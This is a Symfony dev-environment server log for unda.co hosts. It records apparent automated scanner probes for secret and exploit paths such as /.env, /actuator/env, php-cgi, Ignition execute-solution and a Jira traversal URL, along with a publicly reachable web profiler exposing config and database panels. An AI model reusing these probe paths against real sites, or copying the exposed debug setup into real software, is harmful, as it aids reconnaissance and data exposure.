[2025-12-18 13:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:34:13] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-18 13:40:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=security","method":"GET"} []
[2025-12-18 13:40:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 13:42:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 13:47:36] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"HEAD"} []
[2025-12-18 13:47:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 13:47:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 13:47:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 13:47:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 13:47:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 13:47:36] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 13:47:37] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"HEAD"} []
[2025-12-18 13:47:38] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-18 13:47:38] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 13:47:38] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 13:47:38] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 13:47:38] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 13:47:38] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 13:47:38] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 13:47:38] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-18 13:47:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:47:40] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-18 13:47:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 13:47:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 13:47:40] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 13:47:40] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 13:47:40] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 13:47:40] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 13:47:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-18 13:47:42] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"POST"} []
[2025-12-18 13:47:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:47:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:49:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=time","method":"GET"} []
[2025-12-18 13:49:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 13:55:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:55:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 13:58:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=config","method":"GET"} []
[2025-12-18 13:58:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 14:04:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"74da02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/74da02?panel=db","method":"GET"} []
[2025-12-18 14:04:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 14:04:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"628fdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/628fdc?panel=swiftmailer","method":"GET"} []
[2025-12-18 14:04:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-18 14:07:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=twig","method":"GET"} []
